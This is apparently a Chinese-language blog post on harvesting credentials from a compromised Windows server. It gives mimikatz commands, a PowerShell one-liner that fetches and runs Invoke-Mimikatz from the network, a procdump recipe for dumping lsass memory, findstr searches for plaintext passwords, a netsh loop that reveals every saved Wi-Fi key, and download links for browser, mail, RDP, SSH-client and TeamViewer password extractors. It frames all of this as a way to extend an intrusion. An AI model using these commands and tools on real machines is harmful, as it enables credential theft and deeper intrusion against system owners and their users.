Windows下登錄憑證竊取技巧
拿到一臺Windows服務器權限,收集各種登錄憑證以便擴大戰(zhàn)果。本篇分享幾個竊取Windows登錄憑證的工具和技巧。
1、Windows 本地密碼Hash
Windows的系統(tǒng)密碼hash默認情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統(tǒng)下hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值。
例如:
- Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
- 用戶名稱為:Administrator
- RID為:500
- LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE
- NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040
破解方式一:hash在線破解網站
- https://www.objectif-securite.ch/ophcrack
- http://cmd5.com
破解方式二:mimikatz
Github地址:
- https://github.com/gentilkiwi/mimikatz
mimikatz使用起來也非常簡單,提取Windows系統(tǒng)的明文密碼只需兩行命令:
- privilege::debug
- sekurlsa::logonpasswords
破解方式三:wce
- wce的常用參數(shù)使用說明如下:
- 參數(shù)解釋:
- -l 列出登錄的會話和NTLM憑據(jù)(默認值)
- -s 修改當前登錄會話的NTLM憑據(jù) 參數(shù):<用戶名>:<域名>:<LM哈希>:<NT哈希>
- -w 通過摘要式認證緩存一個明文的密碼
破解方式四:Powershell+mimikatz
直接利用poweshell來調用mimikatz抓取系統(tǒng)內的明文密碼。
- powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
破解方式五:prodump+mimikatz
procdump是微軟官方提供的一個小工具,微軟官方下載地址:
- https://technet.microsoft.com/en-us/sysinternals/dd996900
- # 將工具拷貝到目標機器上執(zhí)行如下命令(需要管理員權限,我選擇的版本是64位)
- procdump.exe -accepteula -ma lsass.exe lsass.dmp
- # 將生成的內存dump文件拷貝到mimikatz同目錄下,雙擊打開mimikatz執(zhí)行情況如圖:
- mimikatz # sekurlsa::minidump lsass.dmp
- # Switch to MINIDUMP
- mimikatz # sekurlsa::logonPasswords full
2、抓取瀏覽器密碼
很多瀏覽器都提供了記住密碼的功能,用戶在登錄一些網站的時候會選擇記住密碼。
LaZagne:提取瀏覽器所保存的密碼
github項目地址:
- https://github.com/AlessandroZ/LaZagne
3、服務端明文存儲密碼
在一些配置文件或日志里,明文記錄著敏感的密碼信息,如web.config、config.ini等文件,可通過手動翻查敏感目錄,也可以通過findstr命令來查找敏感文件和內容。
- findstr /i /s "password" *.config
- findstr /i /s "password" *.ini
- findstr /i /s "password" *.xml
4、第三方運維工具托管密碼解密
常見的有Linux運維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠控軟件:Teamviewer等。
xshell 密碼解密工具:
- https://github.com/dzxs/Xdecrypt
提取WinSCP,PuTTY等保存的會話信息:
- https://github.com/Arvanaghi/SessionGopher
從內存中提取TeamViewer密碼的工具:
- https://github.com/attackercan/teamviewer-dumper
一鍵破解客戶端星號密碼--星號密碼查看器。
5、一鍵獲取電腦wifi密碼
- #查看電腦連接過的所有wifi
- netsh wlan show profiles
- #查看wifi信號為Aaron的密碼
- netsh wlan show profiles name="Aaron" key=clear
- #CMD一鍵獲取 所有連接過的WIFI密碼
- for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
6、Windows鍵盤記錄工具
可以記錄用戶鍵盤操作,從而捕獲用戶的敏感信息,在github和T00ls都可以找到這一類的源碼和工具。
7、Windows密碼提取工具合集
各種Windows程序的密碼提取工具,包括各種瀏覽器、郵箱、Windows網絡密碼、無線網絡密鑰等。
IE瀏覽器提取密碼工具:
- https://www.nirsoft.net/toolsdownload/iepv.zip
Firefox 瀏覽器密碼提取工具:
- https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
Chrome 瀏覽器密碼提取工具:
- https://www.nirsoft.net/toolsdownload/chromepass.zip
SVN密碼解密器:
- http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip
郵箱密碼提取工具:
- https://www.nirsoft.net/toolsdownload/mailpv.zip
提取.rdp文件中存儲的密碼:
- https://www.nirsoft.net/toolsdownload/rdpv.zip
MSSQL憑據(jù)密碼獲取工具:
- http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip
